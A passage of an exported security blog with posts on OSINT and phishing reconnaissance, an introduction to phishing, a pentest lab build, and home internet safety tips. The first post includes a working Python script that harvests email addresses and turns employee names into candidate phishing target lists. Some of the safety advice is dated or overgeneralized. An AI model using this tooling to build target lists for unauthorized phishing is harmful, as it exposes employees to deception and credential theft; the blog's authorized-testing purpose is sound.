Thus, by searching for "employees of <target company>" you should be presented with a list of potential employees. Unfortunately, most social media sites do not display email addresses. However, they do usually display first and last names. Now, if you have been able to identify a few (or at least one) valid email addresses, you can work out the email address format. Common email formats are: (fn=first name, fi=first initial, ln=last name)<br /><br /><ul style="text-align: left;"><li>[fi][ln]@company.com</li><li>[fn].[ln]@company.com</li><li>[fn]_[ln]@company.com</li></ul><br />By using this knowledge and the list of first and last names you collected, you should be able to convert them into likely email addresses. Again, it should be noted that the tool Recon-NG has the ability to semi-automate this process of searching social media sites, identifying reported employees, and mangling their names into potential email addresses.<br /><br />Additionally, some of the common tools I typically employ in OSINT are:<br /><ul style="text-align: left;"><li>whois</li><li><a href="https://github.com/laramies/theHarvester">theHarvester</a></li><li><a href="https://bitbucket.org/LaNMaSteR53/recon-ng">Recon-NG</a></li><li><a href="https://www.elevenpaths.com/labstools/foca/index.html">Foca</a></li><li><a href="https://www.paterva.com/web6/products/maltego.php">Maltego</a></li></ul>"whois" is just a command line tool that allows you to look up information on a particular domain name. Many times, this information will contain a few email addresses, names, and phone numbers. 
All of which can be useful during the phishing exercise/engagement.<br /><br />As mentioned before, "theHarvester" is a command line Linux tool that can perform various searches against common search engines to identify email addresses and host names associated with a target domain name.<br /><br />Again, as mentioned earlier, "Recon-NG" is a command line Linux tool that can perform various searches using a multitude of online sources to identify potential employees of a company, identify potentially leaked passwords, generate potential target email address lists, and gather many other bits of useful information.<br /><br />"Foca" is a Windows binary that can search a given target website for any available documents (office docs, PDFs, etc.) and then extract the "metadata" from the documents to identify interesting information such as:<br /><br /><ul style="text-align: left;"><li>usernames</li><li>machine names</li><li>installed software</li></ul>It should be noted that Foca is a commercial product, but does have a limited/free version available.<br /><br />"Maltego" is sort of a "catch all" tool for OSINT. Maltego can perform numerous "transforms" on entered and gathered data to identify associated data from numerous online sources. For example, given a company name, it can identify potential email addresses. From those email addresses, it can attempt to identify the associated people (first name and last name) as well as any online accounts that have the associated email address. And so on. It should be noted that Maltego is a commercial product, but does have a limited/free version available.<br /><br />By no means are the lists above all-inclusive. These are just some of the tools I find myself using on a regular basis. 
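<div>Tying this post's name mangling to the regex extraction from the Email Address Finder post above, the following added Python example (my own code, not find_emails.py or Recon-NG) harvests addresses from constructed search-engine snippets, infers the address format from one employee whose address is already known, and turns a list of names into candidate targets. The domain, names and snippets are constructed; the format table holds the three formats listed above plus two further common ones that I added, and the regex is a tightened version of the one in the Email Address Finder post.</div>

```python
import re

# Added example, not find_emails.py or Recon-NG code. Snippets, names and
# domain below are constructed for the example.


def email_pattern(domain):
    """Compile a matcher for addresses under domain.

    The page's regex, [a-zA-Z0-9\\.\\-_]+@[a-zA-Z0-9\\.\\-]*<domain>, also accepts
    user@notexample.com and user@example.com.au. This one requires the domain
    to sit on a label boundary at both ends and ignores case.
    """
    return re.compile(
        r"[a-z0-9._-]+@(?:[a-z0-9-]+\.)*" + re.escape(domain)
        + r"(?![a-z0-9-]|\.[a-z0-9])",
        re.IGNORECASE,
    )


def extract_emails(text, domain):
    """Unique, lower-cased addresses under domain found anywhere in text."""
    return sorted({m.group(0).lower() for m in email_pattern(domain).finditer(text)})


# Local-part formats: the first three are the ones the post lists, the last
# two are further formats seen in practice (added here).
FORMATS = {
    "[fi][ln]": lambda fn, ln: fn[:1] + ln,
    "[fn].[ln]": lambda fn, ln: f"{fn}.{ln}",
    "[fn]_[ln]": lambda fn, ln: f"{fn}_{ln}",
    "[fn][ln]": lambda fn, ln: fn + ln,
    "[fi].[ln]": lambda fn, ln: f"{fn[:1]}.{ln}",
}


def _normalize(name):
    """Lower-case and strip anything that cannot appear in a local part."""
    return re.sub(r"[^a-z0-9]", "", name.lower())


def infer_formats(known_email, first, last):
    """Which formats turn (first, last) into known_email's local part."""
    local = known_email.split("@", 1)[0].lower()
    fn, ln = _normalize(first), _normalize(last)
    return [name for name, build in FORMATS.items() if build(fn, ln) == local]


def generate_targets(names, fmt, domain):
    """Mangle (first, last) pairs into candidate addresses using one format."""
    build = FORMATS[fmt]
    return sorted({f"{build(_normalize(f), _normalize(l))}@{domain}" for f, l in names})


def build_target_list(snippets, domain, known_person, employees):
    """Harvest addresses, learn the format from one known person, mangle the
    social-media names into candidates; returns (formats, merged target list)."""
    harvested = extract_emails(snippets, domain)
    first, last, known = known_person
    fmts = infer_formats(known, first, last)
    candidates = generate_targets(employees, fmts[0], domain) if fmts else []
    return fmts, sorted(set(harvested) | set(candidates))


# Constructed search-engine snippets and a constructed employee list.
SNIPPETS = (
    "Contact jsmith@example.com for sales. Press: Jane.Doe@mail.example.com. "
    "Not ours: bob@notexample.com, info@example.com.au, JSMITH@EXAMPLE.COM"
)
EMPLOYEES = [("Alice", "Wong"), ("Bob", "O'Brien"), ("alice", "WONG")]

if __name__ == "__main__":
    fmts, targets = build_target_list(
        SNIPPETS, "example.com", ("John", "Smith", "jsmith@example.com"), EMPLOYEES)
    print("detected format(s):", fmts)
    for t in targets:
        print(t)
```

<div>Harvested and generated addresses are merged into one de-duplicated list, but the mangled ones are guesses: keep them separate from confirmed addresses in your notes, since the customer may later ask which targets were verified. If more than one format matches the known address, check a second known employee before generating the list.</div>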
New tools are being developed all of the time, as well as improvements being made to the older tools.<br /><br />In future blog posts, I may go into more detailed reviews of some of the mentioned tools, but for now, just know they exist and go download them and try them out.<br /><br />As always, all comments/questions/criticisms are welcomed.</div><span><a name='more'></a></span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5789294398760146186.post-13804811356574641012015-03-27T14:45:00.000-04:002020-11-17T12:48:14.932-05:00Phishing 101: An Intro<div dir="ltr" style="text-align: left;" trbidi="on">If you search on the internet or attend pretty much any security conference, you will find a plethora of information on what "phishing" is and how to perform it. As such, this post (and the following ones in the series) will just cover the high points and provide useful references on where you can find more in-depth information.<br /><br />At its core, phishing is the sending of an email to a target with the intent of having the target perform some action which will lead to the attacker gaining some new piece of information or access.<br /><br />That statement is a bit vague, and it is meant to be so. That is because phishing can take many forms with many different desired outcomes. 
The typical outcomes are:<br /><ul style="text-align: left;"><li>harvesting credentials from a target, typically via a credential harvesting website</li><li>compromise of the target's web browser via a drive-by browser attack or a malicious Java payload</li><li>compromise of a target's system, typically via a malicious attachment</li></ul>For the purposes of this blog post and the following ones, we will be discussing phishing primarily from the perspective of a contractually/legally authorized phishing exercise/engagement.<br /><br />For most phishing exercises/engagements, the following four steps will occur:<br /><ol style="text-align: left;"><li>Target identification via</li><ol><li>the customer providing the target list</li><li>the attacker performing Open Source Intelligence gathering (<a href="http://blog.seedsofepiphany.com/2013/10/internet-footprinting-aka-osint-open.html">OSINT</a>)</li></ol><li>One or more websites are designed and made active.</li><ol><li>Two possible site types are:</li><ol><li>credential harvesting</li><li>browser exploit</li></ol></ol><li>The attacker will craft and then send the phishing emails to the target email addresses.</li><ol><li>These emails could be nothing more than a simple template containing a URL to one of the previously designed websites, or they could contain a malicious attachment.</li></ol><li>As the exercise/engagement progresses, the attacker will monitor the results and use them to ultimately create a report for the customer.</li></ol>Each of these steps will be discussed in more detail in future blog posts.</div><span><a name='more'></a></span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5789294398760146186.post-14622598491819423742014-09-12T14:46:00.000-04:002020-11-17T12:48:22.010-05:00All security tools need a “–demo” option<div dir="ltr" style="text-align: left;" trbidi="on"><div style="margin-bottom: 1.5em;"><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span 
style="font-size: 15px; line-height: 24px;">Over the past few years I have seen movies actually trying to include actual computer hacking, granted most of it is just showing some output from Nmap.</span></span><br /><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;"><br /></span></span><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;">That got me thinking. Would Hollywood be more likely to include more (and different) “hacking” tools in their movies if they all had a “–demo” flag/option?</span></span><br /><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span><a name='more'></a></span><span style="font-size: 15px; line-height: 24px;"><br /></span></span><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;">The concept is that if you run the tool and provide the “–demo” flag, it will start generating either canned output or start randomly generating output which looks like real output without actually doing anything. This way, the actors/writers/etc… do not actually have to know what they are doing or even learn how to use the tools. All they have to do is run the tool and give the “–demo” flag and they have “real” hacker-stuff showing up on their screen. :)</span></span><br /><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;"><br /></span></span><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;">What do you think? 
Good idea or crap?</span></span><br /><div style="font-family: Georgia, "Times New Roman", "Bitstream Charter", Times, serif; font-size: 15px; line-height: 24px;"><br /></div></div></div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5789294398760146186.post-34732290108298272562013-10-12T14:48:00.000-04:002020-11-17T12:48:29.284-05:00Internet Footprinting (aka OSINT – Open Source Intelligence)<div dir="ltr" style="text-align: left;" trbidi="on"><div style="margin-bottom: 1.5em;"><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;">What is OSINT? Well, according to Wikipedia it is:</span></span><br /><blockquote class="tr_bq"><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;">“Open-source intelligence (OSINT) is intelligence collected from publicly available sources. In the intelligence community (IC), the term “open” refers to overt, publicly available sources (as opposed to covert or clandestine sources); it is not related to open-source software or public intelligence.”</span></span></blockquote><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;">In general, OSINT is simply the identification, collection, and analysis of publicly available data about a person, place, or thing.</span></span><br /><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span><a name='more'></a></span><span style="font-size: 15px; line-height: 24px;"><br /></span></span><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;">OSINT is NOT merely used for cyber stalking or DOXing. 
(DOXing is the act of gathering personal information about people on the Internet, often including real name, known aliases, address, phone number, SSN, credit card number, etc., typically for the sole purpose of causing embarrassment, mischief, and/or harm to the targeted person.)</span></span><br /><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;"><br /></span></span><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;">OSINT has many valid/beneficial uses. These include (but are not limited to):</span></span><br /><br /><ul style="text-align: left;"><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">identifying information about yourself (or your own company) that may be available on the internet</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">part of a network penetration (or social engineering) exercise</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">performing additional/extended background checks on potential corporate partners or employees</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">identifying possible information leakage from your company</span></li></ul><br /><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;">There are a few typical types of OSINT, each with their own PROs/CONs:</span></span><br /><br /><ul style="text-align: left;"><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 
24px;">Purely Passive</span></li><ul><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">PRO - no traffic directed toward the target (i.e. no evidence in server logs)</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">CON - only relying on second-hand data at best</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Examples</span></li><ul><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">search engine cached pages</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">archive.org saved pages</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">searching across pastebin (and similar sites)</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">searching social media sites</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">browsing Shodan for ports, systems, and service banners</span></li></ul></ul><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Typical Internet Traffic</span></li><ul><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">PRO – gaining data directly from the target’s websites and systems</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 
24px;">CON - traffic is being sent directly toward the target, thus showing up in server/system logs</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Examples</span></li><ul><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">DNS queries</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">visiting web pages owned by the target</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">downloading documents from websites</span></li></ul></ul><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Checking Locks and Doors</span></li><ul><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">PRO - possibly gaining amazing amounts of data about types of systems, websites on odd ports, and other services such as FTP, VNC, etc…</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">CON - lots of traffic sent to the target, and the chance of being detected is considerably higher</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Examples</span></li><ul><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">perform DNS brute forcing</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">perform IP scans across the target’s IP space to identify active 
systems</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">perform port scanning to identify open ports and gather banners</span></li></ul></ul></ul><br /><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;">There are numerous commercial/free tools/websites that can be used to perform or assist in OSINT gathering. In future posts, I will be covering many of these tools and websites and discussing how they can be used to perform OSINT.</span></span><br /><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;"><br /></span></span><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;">A few sources of OSINT data (more will be discussed in future posts):</span></span><br /><br /><ul style="text-align: left;"><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Pastebin (and similar sites)</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">DNS (zone transfers, TXT, HINFO, etc… records)</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Websites (email addresses, org charts, documents, addresses, phone numbers, etc…)</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Search engines (Google, Bing, etc…)</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Social networks (LinkedIn, Twitter, Facebook, 
etc…)</span></li></ul></div></div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5789294398760146186.post-44732055455996199802013-09-12T14:45:00.000-04:002020-11-17T12:48:38.489-05:00Building a New Pentest Lab<div dir="ltr" style="text-align: left;" trbidi="on"><div style="margin-bottom: 1.5em;"><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;">A while back I decided that I was going to start a personal infosec “re-education” process during which I hope to learn new tools/techniques, polish up on the abilities I already have, and enhance any areas where I may be lacking. In order to facilitate this, I needed a work area. As with any project (woodworking, automotive, or information security), having the proper work area can make a huge difference in one’s ability to succeed in their endeavors.</span></span><br /><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span><a name='more'></a></span><span style="font-size: 15px; line-height: 24px;"><br /></span></span><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;">For my information security “re-education” project, one key part of my “work area” needed to be a wide variety of operating systems to target/test against. 
There are a few different approaches I could have taken to achieve this:</span></span><br /><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;"><br /></span></span><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;"><b>1) Use what is available.</b></span></span><br /><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;">Look around your house/office. You probably have a few older Windows/Unix systems which you do not use on a regular basis. Odds are you also have a personal printer and/or other network attached devices. All of those make excellent targets.</span></span><br /><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;"><br /></span></span><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;"><b>2) Use what you can borrow.</b></span></span><br /><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Much like the previous option, but in this one, you should ask around with friends/family/etc… to see if anyone has any old/unused hardware/system which they can loan/give you. 
If you are lucky, you can obtain some good (possibly rare) equipment this way.</span><br /><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;"><br /></span></span><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;"><b>3) Use a simple virtualization approach.</b></span></span><br /><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Since you probably do not have access to lots of unused desktops/laptops/etc… on which to install your desired target operating systems, you should look into virtualization. There are several good virtualization solutions available to use (and in most cases, the software itself is free).</span><br /><br /><ul style="text-align: left;"><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">VMware Player</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">QEMU</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">VirtualBox</span></li></ul><br /><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;">Any of these solutions can be easily set up/installed on a personal laptop/desktop. 
Depending on the number of “guest” operating systems you wish to install and run at one time, you may encounter resource contention.</span></span><br /><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;"><br /></span></span><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;"><b>4) Build a full virtualization solution.</b></span></span><br /><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">If the previous option does not provide you with the options/flexibility/resources that you need, you can always build a system solely dedicated to running your “guest” operating systems. This option may require the expenditure of additional money in order to build your new virtualization host system.</span><br /><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;"><br /></span></span><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;"><i><b>Note</b></i>: The above options/approaches are NOT mutually exclusive. You can make use of any/all of them as needed/desired.</span></span><br /><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;"><br /></span></span><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;">The approach I decided to take was a combination of #1 and #4. 
I first took inventory of all the systems I had connected to my home network (laptops, desktops, printers, etc…) and then to house/host all of the other “test/target” systems I thought I would/may need, I decided to build a dedicated virtualization host. For this I decided to go with <a href="https://www.vmware.com/products/vsphere-hypervisor/overview.html">VMWare’s ESXi server</a>. The reason I chose ESXi, is that I have had some experience with it in the past, I can easily get the parts to quickly build a decent system, and it is free.</span></span><br /><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;"><br /></span></span><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;">Below is my shopping list of parts I bought to build my system:</span></span></div><div style="margin-bottom: 1.5em;"><br /><ul style="text-align: left;"><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">($189.99) Seagate Desktop HDD 4 TB SATA 6Gb/s NCQ 64MB Cache 3.5-Inch Internal Bare Drive ST4000DM000</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">($78.99) Silverstone Tek Micro-ATX Mini-DTX, Mini-ITX Mini Tower Plastic with Aluminum Accent Computer Cases PS07B (Black)</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">($17.99) Lite-On Super AllWrite 24X SATA DVD+/-RW Dual Layer Drive - Bulk - IHAS124-04 (Black)</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">($168.99) SUPERMICRO MBD-X9SCM-F-O LGA 1155 Intel C204 Micro ATX Intel Xeon E3 Server 
Motherboard</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">($279.99) Kingston Technology ValueRAM 32GB Kit (4 x 8GB) 1600MHz DDR3 ECC CL11 DIMM with TS Intel Desktop Memory KVR16E11K4/32I</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">($233.99) Intel Xeon Qc E3-1230 Processor</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">($59.99) Corsair Builder Series CX 600 Watt ATX/EPS 80 PLUS (CX600)</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">TOTAL COST = $1029.93</span></li></ul><br /><div style="font-family: Georgia, "Times New Roman", "Bitstream Charter", Times, serif; font-size: 15px; line-height: 24px;">All of the parts were purchased from <a href="http://amazon.com/">Amazon.com</a> (mostly because I have an <a href="http://www.amazon.com/gp/prime">Amazon Prime</a> account and thus did not have to pay for shipping).</div><div style="font-family: Georgia, "Times New Roman", "Bitstream Charter", Times, serif; font-size: 15px; line-height: 24px;"><br /></div><div style="font-family: Georgia, "Times New Roman", "Bitstream Charter", Times, serif; font-size: 15px; line-height: 24px;">As can be seen, the total cost of the system was just over $1000. 
I may have been able to shave some $$$ off of the cost by reusing some of my old/surplus hardware, but I opted to go with all new equipment.</div><div style="font-family: Georgia, "Times New Roman", "Bitstream Charter", Times, serif; font-size: 15px; line-height: 24px;"><br /></div><div><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;">Now that I had my ESXi server built, I needed to populate it with various “guest” operating systems. First, I started by installing a couple of old Windows XP and Vista licenses I had, but I needed more operating systems than that. Luckily for me, there are lots of free VMs and operating systems available: Debian, Ubuntu, Fedora, Mint, etc… In addition, there are great “target” operating systems available as well:</span></span><br /><br /><ul style="text-align: left;"><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Metasploitable 2</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Damn Vulnerable Web Application</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Search on “http://vulnhub.com/” for additional targets.</span></li></ul><br /><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">If I needed additional Windows guests, I could:</span><br /><br /><ul style="text-align: left;"><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Download any available “trials” from the Microsoft website.</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Purchase an MSDN 
Operating System subscription.</span></li></ul><br /><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">I also needed “Hacker” boxes to perform all of my scans from. For this I could either build my own system, follow one of the many guides on the internet to build a pentest Windows/Linux machine, or simply download one of the prebuilt systems.</span><br /><div style="font-family: Georgia, "Times New Roman", "Bitstream Charter", Times, serif; font-size: 15px; line-height: 24px;">Here again, there are LOTS of options to choose from. Personally, I like <a href="http://www.kali.org/downloads/">Kali</a> (the new version of BackTrack).</div></div><div style="font-family: Georgia, "Times New Roman", "Bitstream Charter", Times, serif; font-size: 15px; line-height: 24px;"><br /></div><div style="font-family: Georgia, "Times New Roman", "Bitstream Charter", Times, serif; font-size: 15px; line-height: 24px;">Well, that is a quick overview of my pentest lab. 
If you have any comments/questions/suggestions, please feel free to contact me and/or leave a comment below.</div></div></div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5789294398760146186.post-30580201000442058592013-06-12T14:44:00.000-04:002020-11-17T12:48:48.177-05:00Beware of strangers with candy.<div dir="ltr" style="text-align: left;" trbidi="on"><div style="font-family: Georgia, "Times New Roman", "Bitstream Charter", Times, serif; font-size: 15px; line-height: 24px;"><div style="margin-bottom: 1.5em;">Just as that has always been a good rule to help guide you safely through life, there are also simple rules to help protect you and your home computer while surfing the internet.</div><div style="margin-bottom: 1.5em;">By following a few simple guidelines as well as a few precautions, you should be safe from the vast majority of dangerous threats you will encounter on the internet.<span><a name='more'></a></span></div></div><div style="font-family: Georgia, "Times New Roman", "Bitstream Charter", Times, serif; font-size: 15px; line-height: 24px;">Precautions: (Safety measures)</div><br /><ul style="text-align: left;"><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;"><li>Use a host-based firewall. On Windows, the built-in firewall works fine.</li><li>Use an anti-virus detection application. 
On Windows, the free <a data-mce-href="http://www.microsoft.com/security_essentials/" href="http://www.microsoft.com/security_essentials/" style="-webkit-transition: 0.2s ease-in; color: #fa4e4e; text-decoration: none; transition: all 0.2s ease-in 0s;">Microsoft Security Essentials</a> application works fine.</li><li>Enable automatic download and installation of operating system patches and updates.</li><li>When possible, try to update all of your other programs (Firefox, Adobe, etc...) to the latest stable versions.</li></span></ul><br /><div><div style="margin-bottom: 1.5em;"><div style="font-family: Georgia, "Times New Roman", "Bitstream Charter", Times, serif; font-size: 15px; line-height: 24px;">Internet Guidelines:</div><ul style="text-align: left;"><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Do not go to suspicious websites. (e.g. URLs from China ".cn" and Russia ".ru". Nothing against the countries themselves, but a lot of malicious activities originate from those internet domains.)</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">If the website says that you need to install special software in order to view the site, do not do it. Unless it is Adobe or Java, it is a safe bet that it is a malicious program that they want you to install. 
Even if it is Adobe or Java, you should go to the product's website to download and install the program instead of following a link on the webpage.</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Practice safe information handling:</span></li><ul><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Do not post anything to the internet (Facebook, chat, IM, MySpace, LinkedIn, blog, etc...) that you do not want to be viewed by everyone. Once something is on the internet, it is there forever and eventually will be viewable by anyone.</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Do not provide your password(s) to anyone. No valid customer support will require you to provide them your password. They already have it.</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">For each internet/website account you have (email, Facebook, banking, etc...) use a different password. This makes it much more difficult 